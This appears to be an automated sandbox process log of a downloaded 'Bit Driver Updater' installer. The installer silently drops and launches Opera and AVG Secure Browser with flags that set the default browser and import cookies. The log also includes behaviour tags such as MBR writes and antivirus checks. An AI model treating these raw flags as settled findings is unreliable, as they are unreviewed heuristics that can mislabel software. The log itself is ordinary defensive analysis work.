C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7436 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7672 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7640 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1496 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6528 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7108 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7200 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7580 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7788 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5448 /prefetch:8
-
C:\Users\Admin\Downloads\bitdurtsetup.exe"C:\Users\Admin\Downloads\bitdurtsetup.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KDM1O.tmp\bitdurtsetup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KDM1O.tmp\bitdurtsetup.tmp" /SL5="$905D8,9361252,1413632,C:\Users\Admin\Downloads\bitdurtsetup.exe"
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks for any installed AV software in registry
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /tn "Bit Driver Updater_launcher" /f
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im "bitdu.exe"
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe"C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe" --silent --allusers=0
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exeC:\Users\Admin\AppData\Local\Temp\OperaSetup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=94.0.4606.76 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x71de8658,0x71de8668,0x71de8674
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\OperaSetup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\OperaSetup.exe" --version
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe"C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --pin-additional-shortcuts=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=1340 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20230123113535" --session-guid=8d65b640-962a-464d-a2d3-814f7104d2be --server-tracking-blob="NGNlMzZjNWQxZmI3MzcxNzMyYjYyOTk0Yzc3Nzg5YjhjMDJmNDIzY2M4YmMxYTU1NDZmYWI2YTk1NmJlMGJiZjp7ImNvdW50cnkiOiJJTiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPXBsYXlhbmV4dCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249Yml0X2d1YXJkaWFuIiwidGltZXN0YW1wIjoiMTY3NDQ3MDEzMy4xMzQ1IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJiaXRfZ3VhcmRpYW4iLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJwbGF5YW5leHQifSwidXVpZCI6IjU3Yzc5ZjYwLTc1NmUtNDAxZi1hYjg2LTJlZGJlOGJhYmZiNyJ9 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5405000000000000
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exeC:\Users\Admin\AppData\Local\Temp\OperaSetup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=94.0.4606.76 --initial-client-data=0x300,0x304,0x308,0x2d0,0x30c,0x71328658,0x71328668,0x71328674
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\installer.exe" --backend --initial-pid=1340 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --pin-additional-shortcuts=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202301231135351" --session-guid=8d65b640-962a-464d-a2d3-814f7104d2be --server-tracking-blob="NGNlMzZjNWQxZmI3MzcxNzMyYjYyOTk0Yzc3Nzg5YjhjMDJmNDIzY2M4YmMxYTU1NDZmYWI2YTk1NmJlMGJiZjp7ImNvdW50cnkiOiJJTiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPXBsYXlhbmV4dCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249Yml0X2d1YXJkaWFuIiwidGltZXN0YW1wIjoiMTY3NDQ3MDEzMy4xMzQ1IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJiaXRfZ3VhcmRpYW4iLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJwbGF5YW5leHQifSwidXVpZCI6IjU3Yzc5ZjYwLTc1NmUtNDAxZi1hYjg2LTJlZGJlOGJhYmZiNyJ9 " --silent --desktopshortcut=1 --install-subfolder=94.0.4606.76
- Executes dropped EXE
- Registers COM server for autorun
- Loads dropped DLL
- Enumerates connected drives
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\installer.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=94.0.4606.76 --initial-client-data=0x2bc,0x2c0,0x2c4,0x298,0x2c8,0x7ff91fb22c98,0x7ff91fb22ca8,0x7ff91fb22cb8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe"C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe" --start-maximized
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --start-maximized --ran-launcher
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\opera_crashreporter.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=94.0.4606.76 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2c4,0x2f4,0x7ff91418c490,0x7ff91418c4a0,0x7ff91418c4b0
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --start-stack-profiler --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=2012,i,7361973555488578736,6871010300479453808,131072 /prefetch:2
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --start-stack-profiler --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=1928 --field-trial-handle=2012,i,7361973555488578736,6871010300479453808,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202301231135351\assistant\_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202301231135351\assistant\_sfx.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202301231135351\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202301231135351\assistant\assistant_installer.exe" --version
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202301231135351\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202301231135351\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=94.0.4606.38 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0xf02dc0,0xf02dd0,0xf02ddc
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-E5G66.tmp\avg_secure_browser_setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E5G66.tmp\avg_secure_browser_setup.exe" /s /run_source=avg_ads_bg
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Loads dropped DLL
- Checks for any installed AV software in registry
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\nsn33A5.tmp\AVGBrowserUpdateSetup.exeAVGBrowserUpdateSetup.exe /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9153&installargs=--make-chrome-default --force-default-win10 --reset-default-win10 --auto-import-data%3Dchrome --import-cookies --auto-launch-chrome --private-browsing"
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\GUM4026.tmp\AVGBrowserUpdate.exe"C:\Program Files (x86)\GUM4026.tmp\AVGBrowserUpdate.exe" /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9153&installargs=--make-chrome-default --force-default-win10 --reset-default-win10 --auto-import-data%3Dchrome --import-cookies --auto-launch-chrome --private-browsing"
- Sets file execution options in registry
- Checks computer location settings
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regsvc
- Modifies registry class
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regserver
- Modifies registry class
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1582.3\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1582.3\AVGBrowserUpdateComRegisterShell64.exe"
- Registers COM server for autorun
- Modifies registry class
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1582.3\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1582.3\AVGBrowserUpdateComRegisterShell64.exe"
- Registers COM server for autorun
- Modifies registry class
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1582.3\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1582.3\AVGBrowserUpdateComRegisterShell64.exe"
- Registers COM server for autorun
- Modifies registry class
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgb21haGFpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHVwZGF0ZXJ2ZXJzaW9uPSIxLjguMTU4Mi4zIiBzaGVsbF92ZXJzaW9uPSIxLjguMTU4Mi4zIiBpc21hY2hpbmU9IjEiIGlzX29tYWhhNjRiaXQ9IjAiIGlzX29zNjRiaXQ9IjEiIHNlc3Npb25pZD0ie0MyMzAwQTQzLUE2NEItNEFEQS04REU1LTUyOEI5RjczNzM5OH0iIGNlcnRfZXhwX2RhdGU9IjIwMjUwOTE3IiB1c2VyaWQ9Ins2NDY2NDFBRS1DMDBFLTQzM0UtOUI5OS0xNDNCQ0RBOUI3QkJ9IiB1c2VyaWRfZGF0ZT0iMjAyMzAxMjMiIG1hY2hpbmVpZD0iezAwMDA1OEQ0LUIyN0EtMDEyQi05RTNFLTQ1NDE0NzFFNkM2OX0iIG1hY2hpbmVpZF9kYXRlPSIyMDIzMDEyMyIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiB0ZXN0c291cmNlPSJhdXRvIiByZXF1ZXN0aWQ9IntCMTY4MDBDRS1FNURDLTQ0MUItODlGOS0wNDQ1QTZBQTkwNEJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IHBoeXNtZW1vcnk9IjQiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEuOC4xNTgyLjMiIGxhbmc9ImVuLVVTIiBicmFuZD0iOTE1MyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMjAyMiIvPjwvYXBwPjwvcmVxdWVzdD4
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /handoff "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9153&installargs=--make-chrome-default --force-default-win10 --reset-default-win10 --auto-import-data%3Dchrome --import-cookies --auto-launch-chrome --private-browsing" /installsource otherinstallcmd /sessionid "{C2300A43-A64B-4ADA-8DE5-528B9F737398}" /silent
-
C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exeAVGBrowser.exe --heartbeat --install --create-profile
- Enumerates system info in registry
-
C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=108.0.19667.126 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff91eaa8ea8,0x7ff91eaa8eb8,0x7ff91eaa8ec8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7408 /prefetch:8
-
C:\Users\Admin\Downloads\bitdurtsetup.exe"C:\Users\Admin\Downloads\bitdurtsetup.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-B75FV.tmp\bitdurtsetup.tmp"C:\Users\Admin\AppData\Local\Temp\is-B75FV.tmp\bitdurtsetup.tmp" /SL5="$2057A,9361252,1413632,C:\Users\Admin\Downloads\bitdurtsetup.exe"
- Executes dropped EXE
